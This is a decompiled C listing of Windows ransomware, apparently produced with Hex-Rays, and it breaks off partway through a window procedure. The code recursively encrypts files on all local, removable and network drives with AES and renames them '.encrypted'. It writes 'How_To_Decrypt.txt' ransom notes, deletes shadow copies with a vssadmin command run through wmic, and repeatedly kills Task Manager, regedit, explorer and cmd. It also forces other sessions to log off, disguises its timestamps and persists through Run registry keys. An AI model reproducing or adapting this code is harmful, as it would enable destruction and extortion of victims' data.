/* This file was generated by the Hex-Rays decompiler version 9.0.0.240925.
   Copyright (c) 2007-2021 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

// HANDLE __usercall sub_401000@<eax>(int a1@<eax>);
int __cdecl sub_401080(LPCWSTR lpFileName); // idb
HANDLE __cdecl sub_4012C0(LPCWSTR lpString);
void sub_401490();
void __stdcall __noreturn StartAddress(LPVOID lpThreadParameter);
void __stdcall sub_4015A0();
BOOL sub_4016B0();
HANDLE sub_401710();
HANDLE sub_4017C0();
void __stdcall __noreturn sub_401820(LPVOID lpThreadParameter);
int __cdecl sub_401990(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags); // idb
int sub_401A10();
int sub_401A70();
LSTATUS sub_401AD0();
LSTATUS sub_401B70();
LRESULT __stdcall sub_401BE0(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// DWORD __usercall sub_401D30@<eax>(const WCHAR *a1@<eax>);
WPARAM __stdcall start(HINSTANCE hInstance, int a2, int a3, int a4);
// BOOL __stdcall GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
// BOOL __stdcall VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen);
// DWORD __stdcall GetFileVersionInfoSizeW(LPCWSTR lptstrFilename, LPDWORD lpdwHandle);
// BOOL __stdcall WTSQuerySessionInformationW(HANDLE hServer, DWORD SessionId, WTS_INFO_CLASS WTSInfoClass, LPWSTR *ppBuffer, DWORD *pBytesReturned);
// void __stdcall WTSFreeMemory(PVOID pMemory);
// BOOL __stdcall WTSEnumerateSessionsW(HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_SESSION_INFOW *ppSessionInfo, DWORD *pCount);
// BOOL __stdcall WTSDisconnectSession(HANDLE hServer, DWORD SessionId, BOOL bWait);
// BOOL __stdcall WTSLogoffSession(HANDLE hServer, DWORD SessionId, BOOL bWait);
// BOOL __stdcall Process32FirstW(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
// BOOL __stdcall Process32NextW(HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
// HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);

//-------------------------------------------------------------------------
// Data declarations

// extern LSTATUS (__stdcall *RegOpenKeyW)(HKEY hKey, LPCWSTR lpSubKey, PHKEY phkResult);
// extern BOOL (__stdcall *CryptHashData)(HCRYPTHASH hHash, const BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
// extern LSTATUS (__stdcall *RegSetValueExW)(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData);
// extern LSTATUS (__stdcall *RegCloseKey)(HKEY hKey);
// extern BOOL (__stdcall *CryptAcquireContextW)(HCRYPTPROV *phProv, LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwProvType, DWORD dwFlags);
// extern BOOL (__stdcall *CryptDeriveKey)(HCRYPTPROV hProv, ALG_ID Algid, HCRYPTHASH hBaseData, DWORD dwFlags, HCRYPTKEY *phKey);
// extern LSTATUS (__stdcall *RegCreateKeyW)(HKEY hKey, LPCWSTR lpSubKey, PHKEY phkResult);
// extern BOOL (__stdcall *CryptReleaseContext)(HCRYPTPROV hProv, DWORD dwFlags);
// extern LSTATUS (__stdcall *RegDeleteValueW)(HKEY hKey, LPCWSTR lpValueName);
// extern BOOL (__stdcall *CryptEncrypt)(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen);
// extern BOOL (__stdcall *CryptCreateHash)(HCRYPTPROV hProv, ALG_ID Algid, HCRYPTKEY hKey, DWORD dwFlags, HCRYPTHASH *phHash);
// extern BOOL (__stdcall *CryptDestroyKey)(HCRYPTKEY hKey);
// extern BOOL (__stdcall *CryptDestroyHash)(HCRYPTHASH hHash);
// extern int (__stdcall *GetDeviceCaps)(HDC hdc, int index);
// extern BOOL (__stdcall *ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// extern DWORD (__stdcall *ExpandEnvironmentStringsW)(LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize);
// extern HANDLE (__stdcall *CreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
// extern BOOL (__stdcall *GetVolumeInformationW)(LPCWSTR lpRootPathName, LPWSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPWSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize);
// extern BOOL (__stdcall *SetFileAttributesW)(LPCWSTR lpFileName, DWORD dwFileAttributes);
// extern DWORD (__stdcall *GetCurrentProcessId)();
// extern BOOL (__stdcall *DeleteFileW)(LPCWSTR lpFileName);
// extern BOOL (__stdcall *CloseHandle)(HANDLE hObject);
// extern LANGID (__stdcall *GetSystemDefaultLangID)();
// extern void (__stdcall __noreturn *ExitProcess)(UINT uExitCode);
// extern DWORD (__stdcall *GetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh);
// extern HANDLE (__stdcall *CreateMutexW)(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCWSTR lpName);
// extern HANDLE (__stdcall *FindFirstFileW)(LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
// extern DWORD (__stdcall *SetFilePointer)(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
// extern BOOL (__stdcall *FreeResource)(HGLOBAL hResData);
// extern int (__stdcall *lstrlenA)(LPCSTR lpString);
// extern UINT (__stdcall *GetDriveTypeW)(LPCWSTR lpRootPathName);
// extern BOOL (__stdcall *SetEndOfFile)(HANDLE hFile);
// extern HRSRC (__stdcall *FindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
// extern HGLOBAL (__stdcall *LoadResource)(HMODULE hModule, HRSRC hResInfo);
// extern BOOL (__stdcall *CreateProcessW)(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
// extern BOOL (__stdcall *EndUpdateResourceW)(HANDLE hUpdate, BOOL fDiscard);
// extern DWORD (__stdcall *GetLogicalDriveStringsW)(DWORD nBufferLength, LPWSTR lpBuffer);
// extern void (__stdcall *OutputDebugStringW)(LPCWSTR lpOutputString);
// extern HMODULE (__stdcall *GetModuleHandleW)(LPCWSTR lpModuleName);
// extern BOOL (__stdcall *VirtualFree)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
// extern BOOL (__stdcall *SetFileTime)(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime);
// extern BOOL (__stdcall *WriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// extern HANDLE (__stdcall *OpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
// extern BOOL (__stdcall *TerminateThread)(HANDLE hThread, DWORD dwExitCode);
// extern void (__stdcall *Sleep)(DWORD dwMilliseconds);
// extern BOOL (__stdcall *CopyFileW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, BOOL bFailIfExists);
// extern DWORD (__stdcall *SizeofResource)(HMODULE hModule, HRSRC hResInfo);
// extern DWORD (__stdcall *GetFileAttributesW)(LPCWSTR lpFileName);
// extern BOOL (__stdcall *TerminateProcess)(HANDLE hProcess, UINT uExitCode);
// extern BOOL (__stdcall *FindNextFileW)(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
// extern DWORD (__stdcall *GetModuleFileNameW)(HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
// extern HANDLE (__stdcall *CreateFileW)(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// extern void (__stdcall __noreturn *ExitThread)(DWORD dwExitCode);
// extern int (__stdcall *lstrcmpW)(LPCWSTR lpString1, LPCWSTR lpString2);
// extern int (__stdcall *MultiByteToWideChar)(UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
// extern int (__stdcall *lstrlenW)(LPCWSTR lpString);
// extern DWORD (__stdcall *GetLastError)();
// extern FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
// extern LPVOID (__stdcall *VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
// extern HANDLE (__stdcall *BeginUpdateResourceW)(LPCWSTR pFileName, BOOL bDeleteExistingResources);
// extern BOOL (__stdcall *MoveFileW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName);
// extern BOOL (__stdcall *FindClose)(HANDLE hFindFile);
// extern BOOL (__stdcall *ProcessIdToSessionId)(DWORD dwProcessId, DWORD *pSessionId);
// extern LPVOID (__stdcall *LockResource)(HGLOBAL hResData);
// extern DWORD (__stdcall *WTSGetActiveConsoleSessionId)();
// extern int (__stdcall *lstrcmpiW)(LPCWSTR lpString1, LPCWSTR lpString2);
// extern BOOL (__stdcall *UpdateResourceW)(HANDLE hUpdate, LPCWSTR lpType, LPCWSTR lpName, WORD wLanguage, LPVOID lpData, DWORD cb);
// extern BOOL (__stdcall *GetFileTime)(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime);
// extern LPWSTR *(__stdcall *CommandLineToArgvW)(LPCWSTR lpCmdLine, int *pNumArgs);
// extern PWSTR (__stdcall *StrStrW)(PCWSTR pszFirst, PCWSTR pszSrch);
// extern BOOL (__stdcall *GetMessageW)(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);
// extern void (__stdcall *PostQuitMessage)(int nExitCode);
// extern HCURSOR (__stdcall *LoadCursorW)(HINSTANCE hInstance, LPCWSTR lpCursorName);
// extern int (*wsprintfW)(LPWSTR, LPCWSTR, ...);
// extern HDC (__stdcall *GetDC)(HWND hWnd);
// extern LRESULT (__stdcall *DispatchMessageW)(const MSG *lpMsg);
// extern LRESULT (__stdcall *DefWindowProcW)(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// extern BOOL (__stdcall *SetWindowTextW)(HWND hWnd, LPCWSTR lpString);
// extern BOOL (__stdcall *UpdateWindow)(HWND hWnd);
// extern LRESULT (__stdcall *SendMessageW)(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// extern int (__stdcall *GetSystemMetrics)(int nIndex);
// extern int (__stdcall *MessageBoxW)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType);
// extern HWND (__stdcall *CreateWindowExW)(DWORD dwExStyle, LPCWSTR lpClassName, LPCWSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam);
// extern HBITMAP (__stdcall *LoadBitmapW)(HINSTANCE hInstance, LPCWSTR lpBitmapName);
// extern BOOL (__stdcall *ShowWindow)(HWND hWnd, int nCmdShow);
// extern int (__stdcall *ReleaseDC)(HWND hWnd, HDC hDC);
// extern int (__stdcall *GetWindowTextW)(HWND hWnd, LPWSTR lpString, int nMaxCount);
// extern LONG (__stdcall *GetWindowLongW)(HWND hWnd, int nIndex);
// extern HICON (__stdcall *LoadIconW)(HINSTANCE hInstance, LPCWSTR lpIconName);
// extern ATOM (__stdcall *RegisterClassExW)(const WNDCLASSEXW *);
// extern BOOL (__stdcall *TranslateMessage)(const MSG *lpMsg);
const WCHAR word_403870 = 0u; // idb
wchar_t *off_405000[15] =
{
  L".exe",
  L".dll",
  L".sys",
  L".msi",
  L".com",
  L".lnk",
  L".tmp",
  L".ini",
  L".encrypted",
  L".bin",
  L".bat",
  L".dat",
  L".mui",
  L"How_To_Decrypt.txt",
  L"How_To_Decrypt.txt"
}; // weak
LPVOID lpBuffer = NULL; // idb
HWND dword_405044 = NULL; // idb
WCHAR pszFirst = 0u; // idb
int (__stdcall *RtlComputeCrc32)(_DWORD, _DWORD, _DWORD); // weak
WCHAR pbData[256]; // weak
int dword_405680; // weak
HANDLE hThread; // idb
WCHAR WideCharStr; // idb
_UNKNOWN unk_405EA0; // weak
WCHAR Dst; // idb
HWND hWnd; // idb
int dword_406124; // weak
WCHAR ApplicationName[512]; // weak
WCHAR Parameter; // idb
int dword_406554; // weak
int dword_406558; // weak


//----- (00401000) --------------------------------------------------------
HANDLE __usercall sub_401000@<eax>(int a1@<eax>)
{
  HANDLE result; // eax
  void *v2; // esi
  int v3; // eax
  DWORD NumberOfBytesWritten; // [esp+4h] [ebp-804h] BYREF
  WCHAR FileName[1024]; // [esp+8h] [ebp-800h] BYREF

  wsprintfW(FileName, L"%s.%s", a1, L"How_To_Decrypt.txt");
  result = CreateFileW(FileName, 0x40000000u, 2u, 0, 1u, 0, 0);
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    v3 = lstrlenW(&WideCharStr);
    WriteFile(v2, &WideCharStr, 2 * v3, &NumberOfBytesWritten, 0);
    return (HANDLE)CloseHandle(v2);
  }
  return result;
}
// 4031B8: using guessed type wchar_t aHowToDecryptTx[19];

//----- (00401080) --------------------------------------------------------
int __cdecl sub_401080(LPCWSTR lpFileName)
{
  int v1; // ebx
  HANDLE FileW; // esi
  int v3; // eax
  void *v4; // ebx
  WCHAR *v5; // edi
  DWORD pdwDataLen; // [esp+10h] [ebp-30h] BYREF
  HCRYPTHASH phHash; // [esp+14h] [ebp-2Ch] BYREF
  HCRYPTKEY phKey; // [esp+18h] [ebp-28h] BYREF
  HCRYPTPROV phProv; // [esp+1Ch] [ebp-24h] BYREF
  DWORD NumberOfBytesRead; // [esp+20h] [ebp-20h] BYREF
  int v12; // [esp+24h] [ebp-1Ch]
  struct _FILETIME LastWriteTime; // [esp+28h] [ebp-18h] BYREF
  struct _FILETIME LastAccessTime; // [esp+30h] [ebp-10h] BYREF
  _FILETIME CreationTime; // [esp+38h] [ebp-8h] BYREF

  v1 = 0;
  v12 = 0;
  phKey = 0;
  phHash = 0;
  FileW = CreateFileW(lpFileName, 0xC0000000, 7u, 0, 3u, 0, 0);
  if ( FileW != (HANDLE)-1 )
  {
    GetFileTime(FileW, &CreationTime, &LastAccessTime, &LastWriteTime);
    if ( CryptAcquireContextW(&phProv, 0, L"Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18u, 0xF0000000) )
    {
      if ( CryptCreateHash(phProv, 0x800Cu, 0, 0, &phHash) )
      {
        v3 = lstrlenW(pbData);
        if ( CryptHashData(phHash, (const BYTE *)pbData, 2 * v3, 0)
          && CryptDeriveKey(phProv, 0x6610u, phHash, 5u, &phKey) )
        {
          pdwDataLen = GetFileSize(FileW, 0);
          CryptEncrypt(phKey, 0, 1, 0, 0, &pdwDataLen, 0);
          v4 = VirtualAlloc(0, pdwDataLen, 0x3000u, 4u);
          if ( ReadFile(FileW, v4, pdwDataLen, &NumberOfBytesRead, 0)
            && CryptEncrypt(phKey, 0, 1, 0, (BYTE *)v4, &NumberOfBytesRead, pdwDataLen) )
          {
            SetEndOfFile(FileW);
            SetFilePointer(FileW, 0, 0, 0);
            if ( WriteFile(FileW, v4, pdwDataLen, &NumberOfBytesRead, 0) )
            {
              SetFileTime(FileW, &CreationTime, &LastAccessTime, &LastWriteTime);
              CloseHandle(FileW);
              v5 = (WCHAR *)VirtualAlloc(0, 0x400u, 0x1000u, 4u);
              wsprintfW(v5, L"%s.encrypted", lpFileName);
              MoveFileW(lpFileName, v5);
              VirtualFree(v5, 0, 0x8000u);
              v12 = 1;
              sub_401000((int)lpFileName);
            }
          }
          VirtualFree(v4, 0, 0x8000u);
          CryptDestroyKey(phKey);
          v1 = v12;
        }
        CryptDestroyHash(phHash);
        phHash = 0;
      }
      CryptReleaseContext(phProv, 0);
    }
    CloseHandle(FileW);
  }
  return v1;
}
// 405480: using guessed type WCHAR pbData[256];

//----- (004012C0) --------------------------------------------------------
HANDLE __cdecl sub_4012C0(LPCWSTR lpString)
{
  LPCWSTR v1; // esi
  void (*v2)(LPWSTR, LPCWSTR, ...); // edi
  HANDLE result; // eax
  int v4; // edi
  unsigned int i; // esi
  HANDLE hFindFile; // [esp+10h] [ebp-A58h]
  BOOL v7; // [esp+14h] [ebp-A54h]
  _WIN32_FIND_DATAW FindFileData; // [esp+18h] [ebp-A50h] BYREF
  WCHAR FileName[1024]; // [esp+268h] [ebp-800h] BYREF

  v1 = lpString;
  v2 = (void (*)(LPWSTR, LPCWSTR, ...))wsprintfW;
  v7 = lstrlenW(lpString) == 3;
  wsprintfW(FileName, L"%s\\*.*", lpString);
  result = FindFirstFileW(FileName, &FindFileData);
  hFindFile = result;
  if ( result != (HANDLE)-1 )
  {
    while ( 1 )
    {
      if ( v7 )
        v2(FileName, L"%s%s", v1, FindFileData.cFileName);
      else
        v2(FileName, L"%s\\%s", v1, FindFileData.cFileName);
      if ( (FindFileData.dwFileAttributes & 0x10) != 0 )
      {
        if ( lstrcmpW(FindFileData.cFileName, L"..") )
        {
          if ( lstrcmpW(FindFileData.cFileName, L".") )
            sub_4012C0(FileName);
        }
      }
      else
      {
        v4 = 0;
        for ( i = 0; i < 14; ++i )
        {
          if ( StrStrW(FileName, off_405000[i]) )
            v4 = 1;
        }
        if ( StrStrW(FileName, &Dst) || StrStrW(FileName, L"\\Microsoft\\Windows") )
          v4 = 1;
        if ( (FindFileData.dwFileAttributes & 4) == 0 && (FindFileData.dwFileAttributes & 0x100) == 0 && !v4 )
        {
          if ( FindFileData.dwFileAttributes != 128 )
            SetFileAttributesW(FileName, 0x80u);
          if ( !sub_401080(FileName) )
            DeleteFileW(FileName);
        }
        v1 = lpString;
      }
      if ( !FindNextFileW(hFindFile, &FindFileData) )
        break;
      v2 = (void (*)(LPWSTR, LPCWSTR, ...))wsprintfW;
    }
    return (HANDLE)FindClose(hFindFile);
  }
  return result;
}
// 403378: using guessed type wchar_t aSS[6];
// 405000: using guessed type wchar_t *off_405000[15];

//----- (00401490) --------------------------------------------------------
void sub_401490()
{
  DWORD CurrentProcessId; // eax
  DWORD v1; // ebx
  int v2; // esi
  DWORD SessionId; // edi
  PWTS_SESSION_INFOW ppSessionInfo; // [esp+0h] [ebp-14h] BYREF
  LPWSTR ppBuffer; // [esp+4h] [ebp-10h] BYREF
  DWORD pCount; // [esp+8h] [ebp-Ch] BYREF
  DWORD pSessionId; // [esp+Ch] [ebp-8h] BYREF
  DWORD pBytesReturned; // [esp+10h] [ebp-4h] BYREF

  ppBuffer = 0;
  ppSessionInfo = 0;
  CurrentProcessId = GetCurrentProcessId();
  if ( ProcessIdToSessionId(CurrentProcessId, &pSessionId) )
  {
    WTSEnumerateSessionsW(0, 0, 1u, &ppSessionInfo, &pCount);
    v1 = 0;
    if ( pCount )
    {
      v2 = 0;
      do
      {
        if ( ppSessionInfo[v2].SessionId != pSessionId )
        {
          SessionId = ppSessionInfo[v2].SessionId;
          if ( SessionId != WTSGetActiveConsoleSessionId()
            && WTSQuerySessionInformationW(0, SessionId, WTSConnectState, &ppBuffer, &pBytesReturned)
            && (*ppBuffer == 4 || WTSDisconnectSession(0, ppSessionInfo[v2].SessionId, 1)) )
          {
            WTSLogoffSession(0, ppSessionInfo[v2].SessionId, 1);
          }
        }
        ++v1;
        ++v2;
      }
      while ( v1 < pCount );
    }
    WTSFreeMemory(ppSessionInfo);
  }
}

//----- (00401570) --------------------------------------------------------
void __stdcall __noreturn StartAddress(LPVOID lpThreadParameter)
{
  WCHAR String[10]; // [esp+0h] [ebp-14h] BYREF

  wsprintfW(String, &Parameter);
  sub_4012C0(String);
  ExitThread(0);
}

//----- (004015A0) --------------------------------------------------------
void __stdcall sub_4015A0()
{
  WCHAR *v0; // esi
  HANDLE *v1; // ebx
  int v2; // eax
  bool v3; // zf
  DWORD VolumeSerialNumber; // [esp+4h] [ebp-218h] BYREF
  WCHAR RootPathName[10]; // [esp+8h] [ebp-214h] BYREF
  WCHAR Buffer[256]; // [esp+1Ch] [ebp-200h] BYREF

  sub_401490();
  ExpandEnvironmentStringsW(L"%WINDIR%", &Dst, 0xFFu);
  GetLogicalDriveStringsW(0x100u, Buffer);
  v0 = Buffer;
  if ( Buffer[0] )
  {
    v1 = (HANDLE *)&unk_405EA0;
    do
    {
      if ( GetDriveTypeW(v0) == 3 || GetDriveTypeW(v0) == 2 || GetDriveTypeW(v0) == 4 )
      {
        wsprintfW(RootPathName, L"%s\\", v0);
        if ( GetVolumeInformationW(RootPathName, 0, 0x80u, &VolumeSerialNumber, 0, 0, 0, 0x100u) && VolumeSerialNumber )
        {
          wsprintfW(&Parameter, v0);
          *v1++ = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, &Parameter, 0, 0);
          Sleep(0x1F4u);
        }
      }
      v2 = lstrlenW(v0);
      v3 = v0[v2 + 1] == 0;
      v0 += v2 + 1;
    }
    while ( !v3 );
  }
  Sleep(0xFFFFFFFF);
}

//----- (004016B0) --------------------------------------------------------
BOOL sub_4016B0()
{
  HRSRC ResourceW; // esi
  HGLOBAL Resource; // edi
  const CHAR *v2; // esi
  int v3; // eax
  int v5; // [esp-4h] [ebp-10h]

  ResourceW = FindResourceW(0, (LPCWSTR)0x400, (LPCWSTR)2);
  Resource = LoadResource(0, ResourceW);
  SizeofResource(0, ResourceW);
  v2 = (const CHAR *)LockResource(Resource);
  v5 = lstrlenA(v2);
  v3 = lstrlenA(v2);
  MultiByteToWideChar(0, 0, v2, v3, &WideCharStr, v5);
  return FreeResource(Resource);
}

//----- (00401710) --------------------------------------------------------
HANDLE sub_401710()
{
  HANDLE result; // eax
  void *v1; // edi
  HANDLE FileW; // esi
  struct _FILETIME LastAccessTime; // [esp+10h] [ebp-21Ch] BYREF
  struct _FILETIME CreationTime; // [esp+18h] [ebp-214h] BYREF
  struct _FILETIME LastWriteTime; // [esp+20h] [ebp-20Ch] BYREF
  WCHAR Dst[258]; // [esp+28h] [ebp-204h] BYREF

  ExpandEnvironmentStringsW(L"%systemroot%\\explorer.exe", Dst, 0xFFu);
  result = CreateFileW(Dst, 0x80000000, 1u, 0, 3u, 0x80u, 0);
  v1 = result;
  if ( result )
  {
    if ( GetFileTime(result, &CreationTime, &LastAccessTime, &LastWriteTime) )
    {
      FileW = CreateFileW(&ApplicationName, 0x40000000u, 3u, 0, 3u, 0x2000000u, 0);
      if ( FileW )
      {
        SetFileTime(FileW, &CreationTime, &LastAccessTime, &LastWriteTime);
        CloseHandle(FileW);
      }
    }
    return (HANDLE)CloseHandle(v1);
  }
  return result;
}

//----- (004017C0) --------------------------------------------------------
HANDLE sub_4017C0()
{
  HANDLE result; // eax
  WCHAR FileName[512]; // [esp+0h] [ebp-400h] BYREF

  wsprintfW(FileName, L"%s:Zone.Identifier", &ApplicationName);
  result = CreateFileW(FileName, 0x80000000, 0, 0, 3u, 0, 0);
  if ( result != (HANDLE)-1 )
  {
    CloseHandle(result);
    return (HANDLE)DeleteFileW(FileName);
  }
  return result;
}

//----- (00401820) --------------------------------------------------------
void __stdcall __noreturn sub_401820(LPVOID lpThreadParameter)
{
  HANDLE Toolhelp32Snapshot; // esi
  DWORD th32ProcessID; // esi
  HANDLE v3; // eax
  void *v4; // esi
  DWORD v5; // esi
  HANDLE v6; // eax
  void *v7; // esi
  DWORD v8; // esi
  HANDLE v9; // eax
  void *v10; // esi
  DWORD v11; // esi
  HANDLE v12; // eax
  void *v13; // esi
  HANDLE hSnapshot; // [esp+10h] [ebp-230h]
  PROCESSENTRY32W pe; // [esp+14h] [ebp-22Ch] BYREF

  while ( 1 )
  {
    Sleep(0x64u);
    pe.dwSize = 556;
    Toolhelp32Snapshot = CreateToolhelp32Snapshot(2u, 0);
    hSnapshot = Toolhelp32Snapshot;
    if ( Process32FirstW(Toolhelp32Snapshot, &pe) && Process32NextW(Toolhelp32Snapshot, &pe) )
    {
      do
      {
        if ( !lstrcmpiW(L"taskmgr.exe", pe.szExeFile) )
        {
          th32ProcessID = pe.th32ProcessID;
          if ( th32ProcessID != GetCurrentProcessId() )
          {
            v3 = OpenProcess(1u, 0, th32ProcessID);
            v4 = v3;
            if ( v3 )
            {
              TerminateProcess(v3, 0);
              CloseHandle(v4);
            }
          }
        }
        if ( !lstrcmpiW(L"regedit.exe", pe.szExeFile) )
        {
          v5 = pe.th32ProcessID;
          if ( v5 != GetCurrentProcessId() )
          {
            v6 = OpenProcess(1u, 0, v5);
            v7 = v6;
            if ( v6 )
            {
              TerminateProcess(v6, 0);
              CloseHandle(v7);
            }
          }
        }
        if ( !lstrcmpiW(L"explorer.exe", pe.szExeFile) )
        {
          v8 = pe.th32ProcessID;
          if ( v8 != GetCurrentProcessId() )
          {
            v9 = OpenProcess(1u, 0, v8);
            v10 = v9;
            if ( v9 )
            {
              TerminateProcess(v9, 0);
              CloseHandle(v10);
            }
          }
        }
        if ( !lstrcmpiW(L"cmd.exe", pe.szExeFile) )
        {
          v11 = pe.th32ProcessID;
          if ( v11 != GetCurrentProcessId() )
          {
            v12 = OpenProcess(1u, 0, v11);
            v13 = v12;
            if ( v12 )
            {
              TerminateProcess(v12, 0);
              CloseHandle(v13);
            }
          }
        }
        Toolhelp32Snapshot = hSnapshot;
      }
      while ( Process32NextW(hSnapshot, &pe) );
    }
    CloseHandle(Toolhelp32Snapshot);
  }
}

//----- (00401990) --------------------------------------------------------
int __cdecl sub_401990(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags)
{
  struct _STARTUPINFOW *v3; // esi
  int v4; // edi
  _PROCESS_INFORMATION ProcessInformation; // [esp+8h] [ebp-10h] BYREF

  v3 = (struct _STARTUPINFOW *)VirtualAlloc(0, 4u, 0x1000u, 4u);
  if ( CreateProcessW(lpApplicationName, lpCommandLine, 0, 0, 0, dwCreationFlags, 0, 0, v3, &ProcessInformation) )
  {
    CloseHandle(ProcessInformation.hThread);
    CloseHandle(ProcessInformation.hProcess);
    v4 = 1;
  }
  else
  {
    v4 = 0;
  }
  VirtualFree(v3, 0, 0x8000u);
  return v4;
}

//----- (00401A10) --------------------------------------------------------
int sub_401A10()
{
  WCHAR Dst[256]; // [esp+0h] [ebp-604h] BYREF
  WCHAR CommandLine[514]; // [esp+200h] [ebp-404h] BYREF

  ExpandEnvironmentStringsW(L"%SystemRoot%\\System32\\wbem\\wmic.exe", Dst, 0x104u);
  wsprintfW(CommandLine, L"%s %s", Dst, L"process call create \"cmd.exe /c vssadmin delete shadows /all /quiet\"");
  return sub_401990(Dst, CommandLine, 0x8000000u);
}
// 4034E0: using guessed type wchar_t aProcessCallCre[69];

//----- (00401A70) --------------------------------------------------------
int sub_401A70()
{
  WCHAR Dst[256]; // [esp+0h] [ebp-604h] BYREF
  WCHAR CommandLine[514]; // [esp+200h] [ebp-404h] BYREF

  ExpandEnvironmentStringsW(L"%SystemRoot%\\System32\\wbem\\wmic.exe", Dst, 0x104u);
  wsprintfW(CommandLine, L"%s %s", Dst, L"process call create \"cmd.exe /c start explorer.exe\"");
  return sub_401990(Dst, CommandLine, 0x8000000u);
}
// 403578: using guessed type wchar_t aProcessCallCre_0[52];

//----- (00401AD0) --------------------------------------------------------
LSTATUS sub_401AD0()
{
  int v0; // eax
  int v1; // eax
  HKEY phkResult; // [esp+10h] [ebp-4h] BYREF

  RegCreateKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &phkResult);
  v0 = lstrlenW(ApplicationName);
  RegSetValueExW(phkResult, L"Windows Explorer", 0, 1u, (const BYTE *)ApplicationName, 2 * v0);
  RegCloseKey(phkResult);
  RegCreateKeyW(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &phkResult);
  v1 = lstrlenW(ApplicationName);
  RegSetValueExW(phkResult, L"Windows Explorer", 0, 1u, (const BYTE *)ApplicationName, 2 * v1);
  return RegCloseKey(phkResult);
}
// 406140: using guessed type WCHAR ApplicationName[512];

//----- (00401B70) --------------------------------------------------------
LSTATUS sub_401B70()
{
  HKEY phkResult; // [esp+Ch] [ebp-4h] BYREF

  RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &phkResult);
  RegDeleteValueW(phkResult, L"Windows Explorer");
  RegCloseKey(phkResult);
  RegOpenKeyW(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &phkResult);
  RegDeleteValueW(phkResult, L"Windows Explorer");
  return RegCloseKey(phkResult);
}

//----- (00401BE0) --------------------------------------------------------
LRESULT __stdcall sub_401BE0(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
